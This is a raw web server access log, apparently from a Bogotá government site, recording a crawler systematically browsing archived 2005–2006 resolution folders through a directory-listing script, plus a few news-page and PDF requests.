173.231.60.194 - - [12/Mar/2022:12:48:41 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202006%2FRES%202006%201951-2000%2F&sort=name&order=asc HTTP/1.1" 200 12349
173.231.60.194 - - [12/Mar/2022:12:48:47 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202006%2FRES%202006%202001-2050%2F&sort=name&order=asc HTTP/1.1" 200 12363
173.231.60.194 - - [12/Mar/2022:12:48:53 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202006%2FRES%202006%202051-2100%2F&sort=name&order=asc HTTP/1.1" 200 12363
173.231.60.194 - - [12/Mar/2022:12:48:59 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202006%2FRES%202006%202101-2150%2F&sort=name&order=asc HTTP/1.1" 200 12369
173.231.60.194 - - [12/Mar/2022:12:49:05 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202006%2FRES%202006%202151-2200%2F&sort=name&order=asc HTTP/1.1" 200 12368
173.231.60.194 - - [12/Mar/2022:12:49:11 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202006%2FRES%202006%202201-2250%2F&sort=name&order=asc HTTP/1.1" 200 12366
173.231.60.194 - - [12/Mar/2022:12:49:17 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202006%2FRES%202006%202251-2300%2F&sort=name&order=asc HTTP/1.1" 200 12361
173.231.60.194 - - [12/Mar/2022:12:49:23 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202006%2FRES%202006%202301-2350%2F&sort=name&order=asc HTTP/1.1" 200 12364
141.8.142.81 - - [12/Mar/2022:12:49:24 -0500] "-" 408 -
173.231.60.194 - - [12/Mar/2022:12:49:29 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202006%2FRES%202006%202351-2400%2F&sort=name&order=asc HTTP/1.1" 200 12357
173.231.60.194 - - [12/Mar/2022:12:49:34 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202006%2FRES%202006%202401-2450%2F&sort=name&order=asc HTTP/1.1" 200 12370
173.231.60.194 - - [12/Mar/2022:12:49:40 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202006%2FRES%202006%202451-2500%2F&sort=name&order=asc HTTP/1.1" 200 12154
191.95.60.74 - - [12/Mar/2022:12:49:46 -0500] "GET /secretaria-de-ambiente-abre-ciclo-de-capacitaciones-sobre-techos-verdes-y-jardines-verticales.html HTTP/1.1" 200 1078
173.231.60.194 - - [12/Mar/2022:12:49:46 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202005%2FRES%202005%202101-2150%2F&sort=size&order=desc HTTP/1.1" 200 12345
173.231.60.194 - - [12/Mar/2022:12:49:53 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202005%2FRES%202005%202151-2200%2F&sort=date&order=desc HTTP/1.1" 200 16990
181.62.149.79 - - [12/Mar/2022:12:50:00 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
173.231.60.194 - - [12/Mar/2022:12:50:00 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202005%2FRES%202005%202151-2200%2F&sort=size&order=desc HTTP/1.1" 200 12454
181.62.149.79 - - [12/Mar/2022:12:50:06 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2019%2F HTTP/1.1" 200 233335
173.231.60.194 - - [12/Mar/2022:12:50:08 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202005%2FRES%202005%202201-2250%2F&sort=date&order=desc HTTP/1.1" 200 12362
173.231.60.194 - - [12/Mar/2022:12:50:14 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202005%2FRES%202005%202201-2250%2F&sort=size&order=desc HTTP/1.1" 200 12362
173.231.60.194 - - [12/Mar/2022:12:50:20 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202005%2FRES%202005%202251-2300%2F&sort=date&order=desc HTTP/1.1" 200 12352
213.180.203.98 - - [12/Mar/2022:12:50:24 -0500] "-" 408 -
173.231.60.194 - - [12/Mar/2022:12:50:27 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202005%2FRES%202005%202251-2300%2F&sort=size&order=desc HTTP/1.1" 200 12352
173.231.60.194 - - [12/Mar/2022:12:50:32 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202005%2FRES%202005%202301-2350%2F&sort=date&order=desc HTTP/1.1" 200 12368
173.231.60.194 - - [12/Mar/2022:12:50:38 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202005%2FRES%202005%202301-2350%2F&sort=size&order=desc HTTP/1.1" 200 12368
181.62.149.79 - - [12/Mar/2022:12:50:42 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
173.231.60.194 - - [12/Mar/2022:12:50:45 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202005%2FRES%202005%202351-2400%2F&sort=date&order=desc HTTP/1.1" 200 12365
181.62.149.79 - - [12/Mar/2022:12:50:51 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2011%2F HTTP/1.1" 200 744610
173.231.60.194 - - [12/Mar/2022:12:50:51 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202005%2FRES%202005%202351-2400%2F&sort=size&order=desc HTTP/1.1" 200 12365
181.62.149.79 - - [12/Mar/2022:12:50:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/2962.pdf HTTP/1.1" 200 2929372
173.231.60.194 - - [12/Mar/2022:12:50:58 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202005%2FRES%202005%202401-2450%2F&sort=date&order=desc HTTP/1.1" 200 12360
191.95.50.41 - - [12/Mar/2022:12:51:01 -0500] "GET /alcaldesa-claudia-lopez-les-dio-la-bienvenida-a-las-sembradoras-por-la-reactivaccion.html HTTP/1.1" 200 1264
173.231.60.194 - - [12/Mar/2022:12:51:04 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202005%2FRES%202005%202401-2450%2F&sort=size&order=desc HTTP/1.1" 200 12360
173.231.60.194 - - [12/Mar/2022:12:51:17 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202005%2FRES%202005%202451-2500%2F&sort=date&order=desc HTTP/1.1" 200 12369
